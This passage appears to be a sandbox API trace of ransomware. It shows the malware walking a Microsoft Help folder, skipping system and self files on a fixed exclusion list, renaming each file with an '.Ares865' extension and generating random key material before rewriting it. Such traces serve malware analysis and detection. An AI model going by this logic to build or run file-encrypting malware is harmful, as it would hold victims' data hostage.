RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.471] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.472] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.474] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.475] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.475] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.475] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.476] CloseHandle (hObject=0x15c) returned 1 [0083.476] CloseHandle (hObject=0x118) returned 1 [0083.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="..") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="windows") returned -1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="temp") returned -1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="boot") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="perflogs") returned -1 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.476] lstrlenW (lpString="MS.MSTORE.14.1033.hxn") returned 21 [0083.476] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0083.476] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSTORE.14.1033.hxn" | out: lpString1="MS.MSTORE.14.1033.hxn") returned="MS.MSTORE.14.1033.hxn" [0083.476] lstrlenW (lpString="MS.MSTORE.14.1033.hxn") returned 21 [0083.476] lstrlenW (lpString="Ares865") returned 7 [0083.476] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.476] lstrlenW (lpString=".dll") returned 4 [0083.476] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".dll") returned 1 [0083.477] lstrlenW (lpString=".lnk") returned 4 [0083.477] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".lnk") returned 1 [0083.477] lstrlenW (lpString=".ini") returned 4 [0083.477] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".ini") returned 1 [0083.477] lstrlenW (lpString=".sys") returned 4 [0083.477] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".sys") returned 1 [0083.477] lstrlenW (lpString="MS.MSTORE.14.1033.hxn") returned 21 [0083.477] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.Ares865") returned 63 [0083.477] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.478] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.478] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=332) returned 1 [0083.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.478] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.479] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.479] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.479] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.481] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.481] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.483] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.483] CloseHandle (hObject=0x15c) returned 1 [0083.483] CloseHandle (hObject=0x118) returned 1 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.483] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".") returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="..") returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="windows") returned -1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="temp") returned -1 [0083.483] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="boot") returned 1 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="perflogs") returned -1 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.484] lstrlenW (lpString="MS.OIS.14.1033.hxn") returned 18 [0083.484] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0083.484] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.OIS.14.1033.hxn" | out: lpString1="MS.OIS.14.1033.hxn") returned="MS.OIS.14.1033.hxn" [0083.484] lstrlenW (lpString="MS.OIS.14.1033.hxn") returned 18 [0083.484] lstrlenW (lpString="Ares865") returned 7 [0083.484] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.484] lstrlenW (lpString=".dll") returned 4 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".dll") returned 1 [0083.484] lstrlenW (lpString=".lnk") returned 4 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".lnk") returned 1 [0083.484] lstrlenW (lpString=".ini") returned 4 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".ini") returned 1 [0083.484] lstrlenW (lpString=".sys") returned 4 [0083.484] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".sys") returned 1 [0083.484] lstrlenW (lpString="MS.OIS.14.1033.hxn") returned 18 [0083.484] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.Ares865") returned 60 [0083.484] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.485] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.485] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=314) returned 1 [0083.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.486] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.488] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x440, lpName=0x0) returned 0x15c [0083.490] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x440) returned 0x190000 [0083.491] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.491] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.491] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.492] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.492] CloseHandle (hObject=0x15c) returned 1 [0083.492] CloseHandle (hObject=0x118) returned 1 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.492] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".") returned 1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="..") returned 1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="windows") returned -1 [0083.492] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="temp") returned -1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="boot") returned 1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="perflogs") returned -1 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.493] lstrlenW (lpString="MS.ONENOTE.14.1033.hxn") returned 22 [0083.493] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0083.493] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.ONENOTE.14.1033.hxn" | out: lpString1="MS.ONENOTE.14.1033.hxn") returned="MS.ONENOTE.14.1033.hxn" [0083.493] lstrlenW (lpString="MS.ONENOTE.14.1033.hxn") returned 22 [0083.493] lstrlenW (lpString="Ares865") returned 7 [0083.493] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.493] lstrlenW (lpString=".dll") returned 4 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".dll") returned 1 [0083.493] lstrlenW (lpString=".lnk") returned 4 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".lnk") returned 1 [0083.493] lstrlenW (lpString=".ini") returned 4 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".ini") returned 1 [0083.493] lstrlenW (lpString=".sys") returned 4 [0083.493] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".sys") returned 1 [0083.493] lstrlenW (lpString="MS.ONENOTE.14.1033.hxn") returned 22 [0083.493] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.Ares865") returned 64 [0083.493] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.494] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.494] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0083.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.496] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.496] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.496] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.497] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.498] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.499] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.499] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.499] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.500] CloseHandle (hObject=0x15c) returned 1 [0083.500] CloseHandle (hObject=0x118) returned 1 [0083.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.500] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="..") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="windows") returned -1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="temp") returned -1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="boot") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="perflogs") returned -1 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.500] lstrlenW (lpString="MS.OUTLOOK.14.1033.hxn") returned 22 [0083.500] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0083.500] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.OUTLOOK.14.1033.hxn" | out: lpString1="MS.OUTLOOK.14.1033.hxn") 